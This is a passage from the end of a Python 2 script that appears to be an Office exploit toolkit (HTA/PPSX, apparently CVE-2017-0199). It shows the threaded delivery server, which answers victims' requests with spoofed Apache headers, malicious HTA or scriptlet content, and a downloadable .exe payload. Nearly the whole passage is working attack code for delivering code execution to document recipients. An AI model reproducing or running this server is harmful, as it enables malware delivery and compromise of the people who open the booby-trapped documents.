first_line.split(' ')[0] 407 | # get url 408 | try: 409 | url = first_line.split(' ')[1] 410 | except IndexError: 411 | print "Invalid request from "+client_addr[0] 412 | conn.close() 413 | sys.exit(1) 414 | # check if custom HTA flag is set 415 | if (len(custom)>1): 416 | print "Received request for custom HTA from "+client_addr[0] 417 | try: 418 | size = os.path.getsize(custom) 419 | except OSError: 420 | print "Unable to read exe - "+custom 421 | conn.close() 422 | sys.exit(1) 423 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n" 424 | with open(custom) as fin: 425 | data +=fin.read() 426 | conn.send(data) 427 | conn.close() 428 | sys.exit(1) 429 | conn.close() 430 | sys.exit(1) 431 | check_exe_request = url.find('.exe') 432 | if (check_exe_request > 0): 433 | print "Received request for payload from "+client_addr[0] 434 | try: 435 | size = os.path.getsize(payloadlocation) 436 | except OSError: 437 | print "Unable to read "+payloadlocation 438 | conn.close() 439 | sys.exit(1) 440 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" 441 | with open(payloadlocation) as fin: 442 | data +=fin.read() 443 | conn.send(data) 444 | conn.close() 445 | sys.exit(1) 446 | if method in ['GET', 'get']: 447 | print "Received GET method from "+client_addr[0] 448 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n\r\n" 449 | conn.send(data) 450 | conn.close() 451 | if method in ['OPTIONS', 'options']: 452 | print "Receiver OPTIONS method from "+client_addr[0] 453 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:47:14 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nAllow: OPTIONS,HEAD,GET\r\nContent-Length: 0\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html" 454 | conn.send(data) 455 | conn.close() 456 | if method in ['HEAD', 'head']: 457 | print "Received HEAD method from "+client_addr[0] 458 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/doc\r\n\r\n" 459 | conn.send(data) 460 | conn.close() 461 | sys.exit(1) 462 | except socket.error, ex: 463 | print ex 464 | 465 | 466 | def exploitation_ppsx(): 467 | 468 | print "Server Running on ",host,":",port 469 | 470 | try: 471 | # create a socket 472 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 473 | 474 | # associate the socket to host and port 475 | s.bind((host, port)) 476 | 477 | # listenning 478 | s.listen(BACKLOG) 479 | 480 | except socket.error, (value, message): 481 | if s: 482 | s.close() 483 | print "Could not open socket:", message 484 | sys.exit(1) 485 | 486 | # get the connection from client 487 | while 1: 488 | conn, client_addr = s.accept() 489 | 490 | # create a thread to handle request 491 | thread.start_new_thread(server_thread, (conn, client_addr)) 492 | 493 | s.close() 494 | 495 | def server_thread(conn, client_addr): 496 | 497 | # get the request from browser 498 | try: 499 | request = conn.recv(MAX_DATA_RECV) 500 | if (len(request) > 0): 501 | # parse the first line 502 | first_line = request.split('\n')[0] 503 | 504 | # get method 505 | method = first_line.split(' ')[0] 506 | # get url 507 | try: 508 | url = first_line.split(' ')[1] 509 | except IndexError: 510 | print "Invalid request from "+client_addr[0] 511 | conn.close() 512 | sys.exit(1) 513 | # check if custom SCT flag is set 514 | if (len(custom)>1): 515 | print "Received request for custom SCT from "+client_addr[0] 516 | try: 517 | size = os.path.getsize(custom) 518 | except OSError: 519 | print "Unable to read custom SCT file - "+custom 520 | conn.close() 521 | sys.exit(1) 522 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n" 523 | with open(custom) as fin: 524 | data +=fin.read() 525 | conn.send(data) 526 | conn.close() 527 | sys.exit(1) 528 | conn.close() 529 | sys.exit(1) 530 | check_exe_request = url.find('.exe') 531 | if (check_exe_request > 0): 532 | print "Received request for payload from "+client_addr[0] 533 | try: 534 | size = os.path.getsize(payloadlocation) 535 | except OSError: 536 | print "Unable to read"+payloadlocation 537 | conn.close() 538 | sys.exit(1) 539 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" 540 | with open(payloadlocation) as fin: 541 | data +=fin.read() 542 | conn.send(data) 543 | conn.close() 544 | sys.exit(1) 545 | if method in ['GET', 'get']: 546 | print "Received GET method from "+client_addr[0] 547 | data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" 548 | conn.send(data) 549 | conn.close() 550 | sys.exit(1) 551 | except socket.error, ex: 552 | print ex 553 | 554 | 555 | if __name__ == '__main__': 556 | main(sys.argv[1:]) 557 | --------------------------------------------------------------------------------